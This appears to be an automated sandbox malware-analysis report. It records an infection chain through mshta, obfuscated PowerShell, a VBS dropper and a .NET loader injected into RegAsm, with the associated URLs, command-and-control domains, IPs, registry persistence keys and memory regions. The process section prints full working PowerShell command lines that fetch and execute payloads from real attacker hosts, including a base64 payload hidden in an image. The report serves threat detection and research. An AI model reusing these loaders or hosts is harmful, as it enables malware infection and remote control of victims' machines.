"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? 
? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? 
?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? 
?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? 
?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?EQ? ? ? ? ?RQBS? ? ? ? ?C8? ? ? ? ?egBv? ? ? ? ?GI? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DU? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DM? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?Mw? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"

URLs

Name
IP
Malicious
https://ia803104.us.archive.org
unknown
malicious
http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF
192.3.193.155
malicious
https://ia803104.us.archive.org/27/items/vbs_20240
unknown
malicious
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
207.241.232.154
malicious
http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
192.3.193.155
malicious
http://192.3.193.155/xampp/boz/REDS.txt
192.3.193.155
malicious
cloudsave.duckdns.org
malicious

Domains

Name
IP
Malicious
cloudsave.duckdns.org
192.3.64.135
malicious
ia803104.us.archive.org
207.241.232.154
malicious
zhort.de
88.99.66.38
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
192.3.64.135
cloudsave.duckdns.org
United States
malicious
207.241.232.154
ia803104.us.archive.org
United States
malicious
192.3.193.155
unknown
United States
malicious
88.99.66.38
zhort.de
Germany
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Rmc-CJ3HJ1
exepath
malicious
HKEY_CURRENT_USER\Software\Rmc-CJ3HJ1
licence
malicious
HKEY_CURRENT_USER\Software\Rmc-CJ3HJ1
time
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
511000
heap
page read and write
malicious
631000
heap
page read and write
malicious
12F3D000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
615000
heap
page read and write
malicious
7FE899D0000
trusted library allocation
page execute and read and write
424000
heap
page read and write
43F000
heap
page read and write
7FE89A12000
trusted library allocation
page read and write
1C410000
heap
page read and write
438000
heap
page read and write
7FFFFF84000
trusted library allocation
page readonly
407000
heap
page read and write
1A540000
heap
page execute and read and write
7FE89AC0000
trusted library allocation
page read and write
1C25C000
stack
page read and write
21D0000
heap
page read and write
3274000
trusted library allocation
page read and write
1A97E000
heap
page read and write
3040000
remote allocation
page read and write
4FD9000
heap
page read and write
496000
heap
page read and write
142000
heap
page read and write
3055000
trusted library allocation
page read and write
1C19F000
stack
page read and write
4C27000
heap
page read and write
1C2B1000
heap
page read and write
1A82F000
stack
page read and write
7FE89C44000
trusted library allocation
page read and write
7FE898B4000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
7FE8988B000
trusted library allocation
page read and write
351000
heap
page read and write
401000
heap
page read and write
7FE89A30000
trusted library allocation
page execute and read and write
2360000
heap
page execute and read and write
1C055000
heap
page read and write
625E000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
29CB000
trusted library allocation
page read and write
4C2E000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
4DCF000
heap
page read and write
1AA1C000
heap
page read and write
3780000
trusted library allocation
page read and write
4DA1000
heap
page read and write
6303000
heap
page read and write
4D5F000
heap
page read and write
7FE89890000
trusted library allocation
page read and write
303000
heap
page read and write
1D40000
heap
page read and write
4C7D000
heap
page read and write
3268000
trusted library allocation
page read and write
2E3000
heap
page read and write
4D5F000
heap
page read and write
287E000
trusted library allocation
page read and write
46DE000
heap
page read and write
7FFFFF81000
trusted library allocation
page execute read
10000
heap
page read and write
388000
heap
page read and write
35E000
heap
page read and write
4A70000
heap
page read and write
7FE898B3000
trusted library allocation
page execute and read and write
4D58000
heap
page read and write
1B0D0000
heap
page read and write
1C4EA000
heap
page read and write
12371000
trusted library allocation
page read and write
20000
heap
page read and write
1C537000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
3184000
trusted library allocation
page read and write
4F60000
heap
page read and write
2622000
trusted library allocation
page read and write
389E000
heap
page read and write
419C000
stack
page read and write
4F61000
heap
page read and write
4DA8000
heap
page read and write
3DC2000
heap
page read and write
2D40000
heap
page read and write
3DDC000
heap
page read and write
1F40000
direct allocation
page read and write
393000
heap
page read and write
7FE89BF1000
trusted library allocation
page read and write
2753000
trusted library allocation
page read and write
38F000
heap
page read and write
48D000
heap
page read and write
4C29000
heap
page read and write
2020000
heap
page execute and read and write
7FE89950000
trusted library allocation
page read and write
4DA4000
heap
page read and write
377A000
trusted library allocation
page read and write
132000
stack
page read and write
48C9000
heap
page read and write
486B000
heap
page read and write
1A6F8000
heap
page read and write
610000
heap
page read and write
488E000
heap
page read and write
2494000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
7FE89A20000
trusted library allocation
page read and write
4CF2000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
1CC7000
direct allocation
page read and write
30A000
heap
page read and write
3A2F000
trusted library allocation
page read and write
575000
heap
page read and write
2350000
heap
page execute and read and write
4737000
heap
page read and write
4859000
heap
page read and write
4778000
heap
page read and write
1E40000
direct allocation
page read and write
1AA38000
stack
page read and write
4FD9000
heap
page read and write
1A990000
heap
page read and write
1A7D4000
heap
